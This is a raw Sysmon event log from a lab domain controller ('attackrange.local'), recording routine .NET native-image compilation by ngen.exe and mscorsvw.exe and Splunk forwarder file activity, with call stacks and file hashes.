21:01:55.789{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A143-60D3-C902-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.773{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D15767D5E45B7EA1598F3FD55010ABC7,SHA256=0E1FE51F46152A04720C2873CDB9142FE9242CA825925A650E04FE493CFC8362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.711{4DB9351A-A143-60D3-C802-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SM3PP0H8JY\System.Windows.Presentation.ni.dll.auxMD5=F40386B1E261320E15B94734EB771434,SHA256=4EDEABB8C5B590EF17A9FAE906989FE590A4852F8CB7843C14D40F0E6F9A6B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.711{4DB9351A-A143-60D3-C802-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SM3PP0H8JY\System.Windows.Presentation.ni.dllMD5=88E40D149BDF11667CC698362A7734E7,SHA256=25BA3CE29F1C0D7DA982E4C2177A5A5616F9B110FFB44515572825E483158F47,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:55.696{4DB9351A-A143-60D3-C802-00000000CF01}5160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1428-0\System.Windows.Presentation.dll2021-06-23 21:01:55.696 10341000x800000000000000019318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.570{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A143-60D3-C802-00000000CF01}5160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.555{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A143-60D3-C802-00000000CF01}5160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.555{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A143-60D3-C802-00000000CF01}5160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.461{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A143-60D3-C702-00000000CF01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.445{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A143-60D3-C702-00000000CF01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.445{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A143-60D3-C702-00000000CF01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.383{4DB9351A-A143-60D3-C602-00000000CF01}5724NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JO4NYHMDER\System.Windows.Input.Manipulations.ni.dll.auxMD5=4BDF691B1B50D2D0BF3EF9B3EB2C610C,SHA256=17814F7A01BA6EFFE9D9429E7E319612AF2E56DA6CEFE180B4635D1EE71308C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.383{4DB9351A-A143-60D3-C602-00000000CF01}5724NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JO4NYHMDER\System.Windows.Input.Manipulations.ni.dllMD5=FCEFC9E45125B6EC40A13911651263A4,SHA256=FDAFA5C24294B0B26747B5EB6498CEB0B2E3E495CF47737359527C5846056E20,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:55.367{4DB9351A-A143-60D3-C602-00000000CF01}5724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\165c-0\System.Windows.Input.Manipulations.dll2021-06-23 21:01:55.367 10341000x800000000000000019309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.258{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A143-60D3-C602-00000000CF01}5724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.258{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A143-60D3-C602-00000000CF01}5724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.258{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A143-60D3-C602-00000000CF01}5724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.211{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A143-60D3-C502-00000000CF01}3032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.195{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A143-60D3-C502-00000000CF01}3032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.195{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A143-60D3-C502-00000000CF01}3032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.164{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE4B8575D3CDD42CC4E107110619AED,SHA256=1AA0B7FF8092A886156F8B5840F18150B2C113B559D80E6184685B4852351BE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.148{4DB9351A-A142-60D3-C402-00000000CF01}1336NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9NU9HWLHX7\System.Windows.Forms.DataVisualization.Design.ni.dll.auxMD5=78599A1B8493785F093F32E9AF9022A3,SHA256=A315CF772511B15DB7963986271B11BA254B1B12502368C8E195499848E3CB04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.148{4DB9351A-A142-60D3-C402-00000000CF01}1336NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9NU9HWLHX7\System.Windows.Forms.DataVisualization.Design.ni.dllMD5=43145A886A97B7C87D0CF1A9BBDDA8C5,SHA256=3B2B448EBCB27CE4D9A9C0317D6EFD50D57D635AD7B3ED46BED5BC9793699474,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:55.133{4DB9351A-A142-60D3-C402-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\538-0\System.Windows.Forms.DataVisualization.Design.dll2021-06-23 21:01:55.133 23542300x800000000000000019339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.820{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=712641F927CB215E9EEC32D730317D37,SHA256=E3729AC9CBFA47C35C6943A7FEC248D1ECE3E4894524D3C6BB64CEBAEC05D6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.430{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB0C44A1C02C2CD3AFC26C92E8CDEC2,SHA256=0FFE5D08DB4E543338DE8A4B9C50E91D2810C67C7AE8E88A6BB4533AADABC325,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.180{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.164{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.164{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.055{4DB9351A-A143-60D3-CA02-00000000CF01}55882312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.476{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F157012F3E7472F5E01963294173BEF1,SHA256=32E013A63D0C64D618889404EFC79FF10E787E9CF58C5C07CF7189FDAEC51B59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.351{4DB9351A-A145-60D3-CC02-00000000CF01}42045680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 